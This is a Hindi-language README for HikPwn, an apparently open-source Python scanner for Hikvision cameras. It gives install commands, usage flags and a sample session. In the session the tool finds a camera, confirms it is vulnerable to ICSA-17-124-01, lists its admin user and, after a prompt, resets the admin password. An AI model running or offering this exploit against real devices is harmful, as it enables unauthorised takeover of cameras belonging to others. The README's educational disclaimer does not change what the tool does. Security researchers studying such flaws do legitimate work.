
HikPwn, Hikvision उपकरणों के लिए एक सरल स्कैनर जिसमें बुनियादी भेद्यता स्कैनिंग क्षमताएँ हैं, जो Python 3.8 में लिखा गया है।
HikPwn, पायथन 3.8 में लिखा गया Hikvision उपकरणों के लिए बुनियादी भेद्यता स्कैनिंग क्षमताओं वाला एक सरल स्कैनर है। यह प्रोजेक्ट जिज्ञासावश उत्पन्न हुआ जब मैं कुछ Hikvision के सॉफ्टवेयर और उपकरणों द्वारा उत्पन्न नेटवर्क ट्रैफिक को कैप्चर और देख रहा था।
git clone https://github.com/4n4nk3/HikPwn.git
cd HikPwn
pip install -r requirements.txt
कार्य प्रगति पर है... बने रहें!
usage: hikpwn.py [-h] --interface INTERFACE --address ADDRESS [--active] [--ICSA_17_124_01]
HikPwn, पायथन 3.8 में लिखा गया Hikvision उपकरणों के लिए बुनियादी भेद्यता स्कैनिंग क्षमताओं वाला एक सरल स्कैनर है। Ananke द्वारा: https://github.com/4n4nk3.
वैकल्पिक तर्क:
-h, --help यह सहायता संदेश दिखाएं और बाहर निकलें
--interface INTERFACE उपयोग करने के लिए नेटवर्क इंटरफ़ेस
--address ADDRESS चयनित नेटवर्क इंटरफ़ेस का आईपी पता
--active "सक्रिय" खोज सक्षम करें
--ICSA_17_124_01 खोजे गए उपकरणों पर ICSA-17-124-01 का पता लगाना सक्षम करें
नेटवर्क इंटरफ़ेस के रूप में eth0 और इसके आईपी पते के रूप में XXX.XXX.XXX.XXX का उपयोग कर रहा है...
[*] निष्क्रिय और सक्रिय दोनों खोज के 30 सेकंड शुरू किए गए...
================================================================================
[*] कुल पाए गए उपकरण: 1
XXX.XXX.XXX.XX
================================================================================
[*] सक्रिय खोज के परिणाम:
डिवाइस #1:
लेबल डेटा
--------------------------------------------------
सीरियल नंबर xxxxxxxxxxxxxxxxxxxxx
विवरण DS-2DE4220IW-D
MAC XX:XX:XX:XX:XX:XX
आईपी XXX.XXX.XXX.XX
DHCP उपयोग में false
सॉफ्टवेयर संस्करण V5.4.3build 160810
DSP संस्करण V7.3 build 160801
बूट समय 2019-03-01 00:05:33
सक्रियण स्थिति true
पासवर्ड रीसेट क्षमता true
================================================================================
[*] निष्क्रिय खोज के परिणाम:
डिवाइस #1:
आईपी पता XXX.XXX.XXX.XX और MAC पता XX:XX:XX:XX:XX:XX वाला एक उपकरण पाया गया।
================================================================================
[*] ICSA-17-124-01 के लिए स्कैन शुरू किया जा रहा है...
जाँच की जा रही है कि क्या XXX.XXX.XXX.XX ICSA-17-124-01 के लिए संवेदनशील है और क्या हम डिवाइस पर मौजूद वैध उपयोगकर्ताओं की सूची प्राप्त कर सकते हैं...
XXX.XXX.XXX.XX ICSA_17_124_01 के लिए संवेदनशील है। पुनर्प्राप्त उपयोगकर्ता सूची:
user_id 1
user_name admin
priority high
user_level Administrator
क्या आप भेद्यता का शोषण करना चाहते हैं और admin का पासवर्ड बदलने का प्रयास करना चाहते हैं? (y/n)
>>> y
कृपया संख्याओं और अक्षरों (8-12 वर्ण) से बना एक पासवर्ड दर्ज करें:
>>>
पासवर्ड परिवर्तन सफल।
यह प्रोजेक्ट केवल शैक्षिक उद्देश्यों के लिए है। इसे अवैध गतिविधियों के लिए उपयोग न करें। मैं अवैध या अनैतिक कार्यों का समर्थन या अनुमोदन नहीं करता हूं और इस सॉफ्टवेयर के संभावित दुरुपयोग के लिए जिम्मेदार नहीं ठहराया जा सकता हूं।